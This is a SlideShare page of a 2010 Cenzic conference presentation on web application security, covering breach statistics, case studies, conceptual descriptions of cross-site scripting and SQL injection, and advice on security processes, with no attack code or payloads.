SlideShare a Scribd company logo

The Web Application Security Crisis

Cenzic
Cenzic

Read these 40 slides on why people should care about web application security including the latest stats and descriptions of common attacks. Presented at the Cyber Security Conference in New York, June 2010.

Technology
1 of 40
Download to read offline
The Web Application Security Crisis June 2010 Jon Zucker - Senior Product Manager Cenzic Confidential 1
Agenda  Cenzic  Survey  Web App Security and evolution  Case Studies  Vulnerability examples  The “Tops”  Practical Approaches  Discussion/Q&A Cenzic Confidential 2
About Cenzic  Cenzic secures Websites against hacker attacks via its automated Web vulnerability scanning technology (on-premise software Hailstorm and SaaS products)  Cenzic helps its customers secure trillions of dollars in Web commerce  Cenzic provides compliance testing for GLBA / PCI / SOX & other regulations Cenzic Confidential 3
Survey…  Current situation  Solutions deployed • Manual • Dynamic • Static • WAF • Other  On Premise  SaaS  How often Cenzic Confidential 4
Corporate Security Evolution Web App Database Client Firewall IDS/IPS Server Server Server Intrusion Detection And Prevention Internet Ports 443 & 80 still open Desktop and Content Network Security Application Security Security 1990s 2000s 1980s Cenzic Confidential 5
80 443 Cenzic Confidential 6
Why Web security? Cenzic Confidential 7
Drivers for Web Application Security  Protecting brands • Security breach at App layer can seriously hurt customer trust  Complying with regulations • PCI, GLBA, HIPAA, AB 1950, and many others  Testing all applications on a continuous basis • To stay ahead of new vulnerabilities Protect from the 400+ new threats per month by continually testing Production Applications Cenzic Confidential 8
So what’s in my Web Application? User JavaScript HTML/ Web DOM UI Layer Cookies Plug-Ins/ API Java DHTML Browser SSL Digital HTTP HTTP-S Authentication Communication Layer Certificates Signatures Web COM App Server ASP Middleware Layer Server CORBA DCOM LDAP Server SW/HW Databases XML HTML Data Layer Raw Data CSS/XSL File System Financial HR Source Code - Individual Applications Order Inventory Management Cenzic Confidential 9
Stats  Hackers are attacking everyone… • Banks, Credit Unions, Government Agencies, Small companies, Large companies – Equal opportunity  87% of Websites are vulnerable to attack Source: SearchSecurity – January 2009  75% of enterprises experienced some form of cyber attack in 2009 Source: Symantec Internet Security Report – April 2010  90% of Websites are vulnerable to attack Source: Verizon Business Data Breach Report – April 2009  $6.6 Million is the average cost of a data breach Source: Ponemon Institute – January 2009 Cenzic Confidential 10
Vulnerability trends Source: Cenzic Q3-Q4, 2009 Application Trends Report Cenzic Confidential 11
Web Vulnerabilities by class – (Commercial Apps) Source: Cenzic Q3-Q4, 2009 Application Trends Report Cenzic Confidential 12
Vulnerability Breakdown of Misc. Category Source: Cenzic Q3-Q4, 2009 Application Trends Report Cenzic Confidential 13
Web Vulnerabilities by class – (Proprietary apps) Source: Cenzic Q3-Q4, 2009 Application Trends Report Cenzic Confidential 14
Findings from Cenzic ClickToSecure Managed Source: Cenzic Q3-Q4, 2009 Application Trends Report Cenzic Confidential 15
No One Wants To Be in the Press “Who is responsible when a hack occurs?” “False sense of Security” “Concerns with finding all vulnerabilities” “Worried” Cenzic Confidential 16
Why worry? Source: People's Daily Online 5-19-10 A total of 81 government Web sites in China were  81 govt sites tampered from May 10 to May 16, down 35 percent compared to the previous week, according  May 10th-16th to a report released by National Computer Network Emergency Response Technical Team.  down 35% As of 12 p.m. on Monday, 29 hacked government  29 hacked sites…still not been Web sites had still not been restored, including restored four provincial Web sites. Monitoring shows major threats are from software risk loopholes, spread of  150 .CN malicious domain names malicious codes and page revisions. The report revealed 150 .CN malicious domain  5 malicious codes names, five malicious codes and five software loopholes. And .xorg.pl, a malicious domain group  5 software loopholes registered in Poland, has more than 100 malicious domain names and has been used to tamper with  Malicious domain group registered many Chinese Web sites and users. in Poland Data shows security awareness and security  100 malicious domain names measures should be strengthened. And 124 government Web sites were hacked from May 2 to  Security awareness and security May 9. measure should be strengthened  124 Web sites were hacked form May 2-9 Cenzic Confidential 17
Case Studies Cenzic Confidential 18
Specific Hacking Case Studies: Heartland  Disclosed in January, 2009  Up to 130M cards exposed – largest attack (more than TJX) • Not discovered until late 2008 • Impact: • Stock price went down 78% • Breach related expenses of $140 million • Millions of dollars in damages and recovery • Embarrassment for the company • Revenue loss • Learning: • PCI compliance ≠ App security Cenzic Confidential 19
Specific Hacking Case Studies: RBS World Pay  Disclosed in December, 2008  Up to 1.5M cards stolen • Installed Malware • Cloned cards were given to an army of “cashers” across 49 cities around the world • Visited 2,100 ATM machines in 280 cities • Impact: • $9M stolen in less than 12 hours • Embarrassment for the company • Reputation damage • Learning: • Hackers are getting very sophisticated and organized Cenzic Confidential 20
Vulnerability Examples Cenzic Confidential 21
Cross-Site Scripting (XSS)  What is it?: Found in web applications which allow code injection by malicious web users into the web pages viewed by other users. The Web Application is used to store, transport, and deliver malicious active content to an unsuspecting user. Used by attackers to bypass access controls such as the same origin policy. Recently, used to craft powerful phishing attacks and browser exploits.  Root Cause: Failure to proactively reject or scrub malicious characters from input vectors. Cenzic Confidential 22
Impacts of XSS  Session Hijacking: Hacker can steal the session id of the user and use it conduct transactions  Record Key Strokes: Hacker can record all the keystrokes of the victim  Entry point: Hacker can use XSS to hack into the network and go deeper into other servers  Steal information: A victim’s files and PII can be accessed and exploited by the hacker Cenzic Confidential 23
SQL Injection  What is it?: Database contents are compromised or disclosed by the use of specially crafted form input that manipulates SQL Query Logic.  Root Cause: Failure to properly sanitize, reject, or escape domain-specific SQL characters from an input vector. Cenzic Confidential 24
Impacts of SQL Injection  Customer information: Hacker can get access to all your customer records  Public Defacement: Hackers can easily deface thousands of sites with one attack  Database Server: Hacker can compromise a database server with SQL attacks  Bypass Log-in: By using simple SQL commands, a hacker can bypass the log-in credentials Cenzic Confidential 25
Cenzic Confidential 26
The “tops” Cenzic Confidential 27
Top 5 Web Security Myths  I have SSL so that’ll protect my Web site • SSL ≠ App Security  Have never been hacked • How do you know?  PCI compliant • Heartland, Hannaford…  I can test few of my Web applications once a year • Any vulnerable site is your weakest link  Expensive • Many flexible options to get you jump started Cenzic Confidential 28
Top Reason #1 Web Applications Are Getting More Complex  Web 2.0 technologies exacerbate the problem • Think you are not using Web 2.0? Think again!  e.g. Software mashups • How do you know any of the original app is secure? • How do you know the resulting app does not include new vulns? Cenzic Confidential 29
Top Reason #2 Compliance Pressure Isn’t Letting Up (PCI, SOX, GLBA, HIPAA, FIECC, …)  Each regulation may have some level of implication on application security  PCI section 6 has specific provision requirements for Web security  We expect more regulations to follow suite • California AB 211, section 1, 56.36 (b) Cenzic Confidential 30
Top Reason #3 Third Party Code is Prevalent • Outsourced, open source, and packaged applications  Enterprises use more open source code than they know • Apache, Net SNMP, Zlib, JBoss  Few software outsourcing providers have secure coding provisions or service level guarantees  Do you know the security quality of third-party code and apps? Cenzic Confidential 31
Practical Approaches Cenzic Confidential 32
Application Security Maturity Model High Tools & Technology Low Panic Scramble Pit of Despair Security as Core Business Process Low High People & Process 33
Enterprise Security Challenge C-Level Will I get Hacked? Information Security Dev Dev Dev Business Unit Business Unit Business Unit QA QA QA App 1 App 1 App 1 App 2 App 2 App 2 App 3 App 3 App 3 Pre-Production Dev, QA, Staging Production Cenzic Confidential 34
Web & Software Security Lifecycle Production/ Launch update1 update2 Training Dev Begins Alpha/Beta ... Planning Scanning/Testing Application Security is NOT a One Time Event but a Discipline Over Time! Cenzic Confidential 35
SDLC & Black Box Testing Software Development Life Cycle Design Build Deploy Operate Code Review Build & Test Automation White Box Testing Black Box Testing Pen Test Decision Support & Process Optimization Cenzic Confidential 36
You May Have To Change Internal Procedures & Processes  Buy in • Management • Grass roots  Create a dedicated application security role • Align this role with business, operations, and development and QA • Define responsibility and accountability structure  Engage business to define priorities, standards, and Seat at the table… policies Cenzic Confidential 37
You May Have To Change Internal Procedures & Processes  Move certain security functions into operations • Security measures must be simple enough for non-experts • Must integrate with existing operational procedures and tools  Metrics • Implement reporting and metrics to measure risk • Identify technology solutions/services that will provide meaningful metrics • Review, rinse, repeat START! Cenzic Confidential 38
Final Thoughts  This is real  Bad guys are getting smarter  Think about process/strategy  Test frequently  Starting Early = less $$ Cenzic Confidential 39
Jon Zucker jon@cenzic.com www.Cenzic.com | 1-866-4-CENZIC (1-866-423-6942) Cenzic Confidential 40

Recommended

Ular Tangga Internet Sehat
Ular Tangga Internet SehatUlar Tangga Internet Sehat
Ular Tangga Internet Sehat
ICT Watch
 
Top 10 Retail Food Restaurants on Facebook in South Africa - November 2016
Top 10 Retail Food Restaurants on Facebook in South Africa - November 2016Top 10 Retail Food Restaurants on Facebook in South Africa - November 2016
Top 10 Retail Food Restaurants on Facebook in South Africa - November 2016
Andrew Felbert
 
Buku Internet Sehat
Buku Internet SehatBuku Internet Sehat
Buku Internet Sehat
ICT Watch
 
Continuous Monitoring for Web Application Security
Continuous Monitoring for Web Application SecurityContinuous Monitoring for Web Application Security
Continuous Monitoring for Web Application Security
Cenzic
 
How to Overcome the 5 Barriers to Production App Security Testing
How to Overcome the 5 Barriers to Production App Security TestingHow to Overcome the 5 Barriers to Production App Security Testing
How to Overcome the 5 Barriers to Production App Security Testing
Cenzic
 
Essentials of Web Application Security: what it is, why it matters and how to...
Essentials of Web Application Security: what it is, why it matters and how to...Essentials of Web Application Security: what it is, why it matters and how to...
Essentials of Web Application Security: what it is, why it matters and how to...
Cenzic
 
Ians cenzic webinar
Ians cenzic webinarIans cenzic webinar
Ians cenzic webinar
Cenzic
 
Top 10 Ways To Win Budget For Application Security - Cenzic.2013.05.22
Top 10 Ways To Win Budget For Application Security - Cenzic.2013.05.22Top 10 Ways To Win Budget For Application Security - Cenzic.2013.05.22
Top 10 Ways To Win Budget For Application Security - Cenzic.2013.05.22
Cenzic
 

Recommended

Ular Tangga Internet Sehat
Ular Tangga Internet SehatUlar Tangga Internet Sehat
Ular Tangga Internet Sehat
ICT Watch
 
Top 10 Retail Food Restaurants on Facebook in South Africa - November 2016
Top 10 Retail Food Restaurants on Facebook in South Africa - November 2016Top 10 Retail Food Restaurants on Facebook in South Africa - November 2016
Top 10 Retail Food Restaurants on Facebook in South Africa - November 2016
Andrew Felbert
 
Buku Internet Sehat
Buku Internet SehatBuku Internet Sehat
Buku Internet Sehat
ICT Watch
 
Continuous Monitoring for Web Application Security
Continuous Monitoring for Web Application SecurityContinuous Monitoring for Web Application Security
Continuous Monitoring for Web Application Security
Cenzic
 
How to Overcome the 5 Barriers to Production App Security Testing
How to Overcome the 5 Barriers to Production App Security TestingHow to Overcome the 5 Barriers to Production App Security Testing
How to Overcome the 5 Barriers to Production App Security Testing
Cenzic
 
Essentials of Web Application Security: what it is, why it matters and how to...
Essentials of Web Application Security: what it is, why it matters and how to...Essentials of Web Application Security: what it is, why it matters and how to...
Essentials of Web Application Security: what it is, why it matters and how to...
Cenzic
 
Ians cenzic webinar
Ians cenzic webinarIans cenzic webinar
Ians cenzic webinar
Cenzic
 
Top 10 Ways To Win Budget For Application Security - Cenzic.2013.05.22
Top 10 Ways To Win Budget For Application Security - Cenzic.2013.05.22Top 10 Ways To Win Budget For Application Security - Cenzic.2013.05.22
Top 10 Ways To Win Budget For Application Security - Cenzic.2013.05.22
Cenzic
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
apidays
 
Tech Trends Report 2024 Future Today Institute.pdf
Tech Trends Report 2024 Future Today Institute.pdfTech Trends Report 2024 Future Today Institute.pdf
Tech Trends Report 2024 Future Today Institute.pdf
hans926745
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
HampshireHUG
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
Anna Loughnan Colquhoun
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
The Digital Insurer
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
ThousandEyes
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
ThousandEyes
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
vu2urc
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
sudhanshuwaghmare1
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
wesley chun
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of Terraform
Andrey Devyatkin
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?
Antenna Manufacturer Coco
 
Advantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessAdvantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your Business
Pixlogix Infotech
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
UK Journal
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
Joaquim Jorge
 
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
?#DUbAI#??##{{(☎️+971_581248768%)**%*]'#abortion pills for sale in dubai@
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Miguel Araújo
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
Igalia
 
2024 State of Marketing Report – by Hubspot
2024 State of Marketing Report – by Hubspot2024 State of Marketing Report – by Hubspot
2024 State of Marketing Report – by Hubspot
Marius Sescu
 
Everything You Need To Know About ChatGPT
Everything You Need To Know About ChatGPTEverything You Need To Know About ChatGPT
Everything You Need To Know About ChatGPT
Expeed Software
 

More Related Content

Recently uploaded

TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
vu2urc
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
UK Journal
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
Joaquim Jorge
 
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
?#DUbAI#??##{{(☎️+971_581248768%)**%*]'#abortion pills for sale in dubai@
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Miguel Araújo
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
Igalia
 

Recently uploaded (20)

TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
 
Tech Trends Report 2024 Future Today Institute.pdf
Tech Trends Report 2024 Future Today Institute.pdfTech Trends Report 2024 Future Today Institute.pdf
Tech Trends Report 2024 Future Today Institute.pdf
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of Terraform
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?
 
Advantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessAdvantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your Business
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
 
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
 

Featured

How Race, Age and Gender Shape Attitudes Towards Mental Health
How Race, Age and Gender Shape Attitudes Towards Mental HealthHow Race, Age and Gender Shape Attitudes Towards Mental Health
How Race, Age and Gender Shape Attitudes Towards Mental Health
ThinkNow
 
Social Media Marketing Trends 2024 // The Global Indie Insights
Social Media Marketing Trends 2024 // The Global Indie InsightsSocial Media Marketing Trends 2024 // The Global Indie Insights
Social Media Marketing Trends 2024 // The Global Indie Insights
Kurio // The Social Media Age(ncy)
 
Trends In Paid Search: Navigating The Digital Landscape In 2024
Trends In Paid Search: Navigating The Digital Landscape In 2024Trends In Paid Search: Navigating The Digital Landscape In 2024
Trends In Paid Search: Navigating The Digital Landscape In 2024
Search Engine Journal
 
5 Public speaking tips from TED - Visualized summary
5 Public speaking tips from TED - Visualized summary5 Public speaking tips from TED - Visualized summary
5 Public speaking tips from TED - Visualized summary
SpeakerHub
 

Featured (20)

2024 State of Marketing Report – by Hubspot
2024 State of Marketing Report – by Hubspot2024 State of Marketing Report – by Hubspot
2024 State of Marketing Report – by Hubspot
 
Everything You Need To Know About ChatGPT
Everything You Need To Know About ChatGPTEverything You Need To Know About ChatGPT
Everything You Need To Know About ChatGPT
 
Product Design Trends in 2024 | Teenage Engineerings
Product Design Trends in 2024 | Teenage EngineeringsProduct Design Trends in 2024 | Teenage Engineerings
Product Design Trends in 2024 | Teenage Engineerings
 
How Race, Age and Gender Shape Attitudes Towards Mental Health
How Race, Age and Gender Shape Attitudes Towards Mental HealthHow Race, Age and Gender Shape Attitudes Towards Mental Health
How Race, Age and Gender Shape Attitudes Towards Mental Health
 
AI Trends in Creative Operations 2024 by Artwork Flow.pdf
AI Trends in Creative Operations 2024 by Artwork Flow.pdfAI Trends in Creative Operations 2024 by Artwork Flow.pdf
AI Trends in Creative Operations 2024 by Artwork Flow.pdf
 
Skeleton Culture Code
Skeleton Culture CodeSkeleton Culture Code
Skeleton Culture Code
 
PEPSICO Presentation to CAGNY Conference Feb 2024
PEPSICO Presentation to CAGNY Conference Feb 2024PEPSICO Presentation to CAGNY Conference Feb 2024
PEPSICO Presentation to CAGNY Conference Feb 2024
 
Content Methodology: A Best Practices Report (Webinar)
Content Methodology: A Best Practices Report (Webinar)Content Methodology: A Best Practices Report (Webinar)
Content Methodology: A Best Practices Report (Webinar)
 
How to Prepare For a Successful Job Search for 2024
How to Prepare For a Successful Job Search for 2024How to Prepare For a Successful Job Search for 2024
How to Prepare For a Successful Job Search for 2024
 
Social Media Marketing Trends 2024 // The Global Indie Insights
Social Media Marketing Trends 2024 // The Global Indie InsightsSocial Media Marketing Trends 2024 // The Global Indie Insights
Social Media Marketing Trends 2024 // The Global Indie Insights
 
Trends In Paid Search: Navigating The Digital Landscape In 2024
Trends In Paid Search: Navigating The Digital Landscape In 2024Trends In Paid Search: Navigating The Digital Landscape In 2024
Trends In Paid Search: Navigating The Digital Landscape In 2024
 
5 Public speaking tips from TED - Visualized summary
5 Public speaking tips from TED - Visualized summary5 Public speaking tips from TED - Visualized summary
5 Public speaking tips from TED - Visualized summary
 
ChatGPT and the Future of Work - Clark Boyd
ChatGPT and the Future of Work - Clark Boyd ChatGPT and the Future of Work - Clark Boyd
ChatGPT and the Future of Work - Clark Boyd
 
Getting into the tech field. what next
Getting into the tech field. what next Getting into the tech field. what next
Getting into the tech field. what next
 
Google's Just Not That Into You: Understanding Core Updates & Search Intent
Google's Just Not That Into You: Understanding Core Updates & Search IntentGoogle's Just Not That Into You: Understanding Core Updates & Search Intent
Google's Just Not That Into You: Understanding Core Updates & Search Intent
 
How to have difficult conversations
How to have difficult conversations How to have difficult conversations
How to have difficult conversations
 
Introduction to Data Science
Introduction to Data ScienceIntroduction to Data Science
Introduction to Data Science
 
Time Management & Productivity - Best Practices
Time Management & Productivity - Best PracticesTime Management & Productivity - Best Practices
Time Management & Productivity - Best Practices
 
The six step guide to practical project management
The six step guide to practical project managementThe six step guide to practical project management
The six step guide to practical project management
 
Beginners Guide to TikTok for Search - Rachel Pearson - We are Tilt __ Bright...
Beginners Guide to TikTok for Search - Rachel Pearson - We are Tilt __ Bright...Beginners Guide to TikTok for Search - Rachel Pearson - We are Tilt __ Bright...
Beginners Guide to TikTok for Search - Rachel Pearson - We are Tilt __ Bright...
 

The Web Application Security Crisis

  • 1. The Web Application Security Crisis June 2010 Jon Zucker - Senior Product Manager Cenzic Confidential 1
  • 2. Agenda  Cenzic  Survey  Web App Security and evolution  Case Studies  Vulnerability examples  The “Tops”  Practical Approaches  Discussion/Q&A Cenzic Confidential 2
  • 3. About Cenzic  Cenzic secures Websites against hacker attacks via its automated Web vulnerability scanning technology (on-premise software Hailstorm and SaaS products)  Cenzic helps its customers secure trillions of dollars in Web commerce  Cenzic provides compliance testing for GLBA / PCI / SOX & other regulations Cenzic Confidential 3
  • 4. Survey…  Current situation  Solutions deployed • Manual • Dynamic • Static • WAF • Other  On Premise  SaaS  How often Cenzic Confidential 4
  • 5. Corporate Security Evolution Web App Database Client Firewall IDS/IPS Server Server Server Intrusion Detection And Prevention Internet Ports 443 & 80 still open Desktop and Content Network Security Application Security Security 1990s 2000s 1980s Cenzic Confidential 5
  • 6. 80 443 Cenzic Confidential 6
  • 7. Why Web security? Cenzic Confidential 7
  • 8. Drivers for Web Application Security  Protecting brands • Security breach at App layer can seriously hurt customer trust  Complying with regulations • PCI, GLBA, HIPAA, AB 1950, and many others  Testing all applications on a continuous basis • To stay ahead of new vulnerabilities Protect from the 400+ new threats per month by continually testing Production Applications Cenzic Confidential 8
  • 9. So what’s in my Web Application? User JavaScript HTML/ Web DOM UI Layer Cookies Plug-Ins/ API Java DHTML Browser SSL Digital HTTP HTTP-S Authentication Communication Layer Certificates Signatures Web COM App Server ASP Middleware Layer Server CORBA DCOM LDAP Server SW/HW Databases XML HTML Data Layer Raw Data CSS/XSL File System Financial HR Source Code - Individual Applications Order Inventory Management Cenzic Confidential 9
  • 10. Stats  Hackers are attacking everyone… • Banks, Credit Unions, Government Agencies, Small companies, Large companies – Equal opportunity  87% of Websites are vulnerable to attack Source: SearchSecurity – January 2009  75% of enterprises experienced some form of cyber attack in 2009 Source: Symantec Internet Security Report – April 2010  90% of Websites are vulnerable to attack Source: Verizon Business Data Breach Report – April 2009  $6.6 Million is the average cost of a data breach Source: Ponemon Institute – January 2009 Cenzic Confidential 10
  • 11. Vulnerability trends Source: Cenzic Q3-Q4, 2009 Application Trends Report Cenzic Confidential 11
  • 12. Web Vulnerabilities by class – (Commercial Apps) Source: Cenzic Q3-Q4, 2009 Application Trends Report Cenzic Confidential 12
  • 13. Vulnerability Breakdown of Misc. Category Source: Cenzic Q3-Q4, 2009 Application Trends Report Cenzic Confidential 13
  • 14. Web Vulnerabilities by class – (Proprietary apps) Source: Cenzic Q3-Q4, 2009 Application Trends Report Cenzic Confidential 14
  • 15. Findings from Cenzic ClickToSecure Managed Source: Cenzic Q3-Q4, 2009 Application Trends Report Cenzic Confidential 15
